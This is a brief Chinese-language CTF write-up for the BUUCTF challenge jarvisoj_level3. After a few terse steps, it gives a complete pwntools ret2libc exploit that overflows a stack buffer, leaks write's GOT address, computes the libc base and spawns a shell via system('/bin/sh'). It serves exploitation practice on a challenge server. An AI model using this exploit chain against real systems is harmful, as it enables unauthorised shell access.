BUUCTF | jarvisoj_level3

本题与pwn2_sctf_2016类似，便简单描述
1.checksec

2.ida

栈溢出，无sys,nx保护，泄露libc
3.libc 版本

下载即可

完整exp:

点击查看代码

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = remote('node5.buuoj.cn', 29052)
elf = ELF('./level3')

p_main = 0x08048484
plt_write = elf.plt['write']
got_write = elf.got['write']

p.recvuntil('Input:\n')
payload1 = b'M'*(0x88+4) + p32(plt_write) + p32(p_main) + p32(1) + p32(got_write) + p32(4)
p.send(payload1)

addr = u32(p.recv(4))

libc = ELF('./libc-2.23.so') 
libc_write = libc.symbols['write']
libc_base = addr - libc_write
p_system = libc_base + libc.symbols['system']
p_binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

p.recvuntil('Input:\n')

payload2 = b'M'*(0x88+4) + p32(p_system) + b'aaaa' + p32(p_binsh)
p.send(payload2)
p.interactive()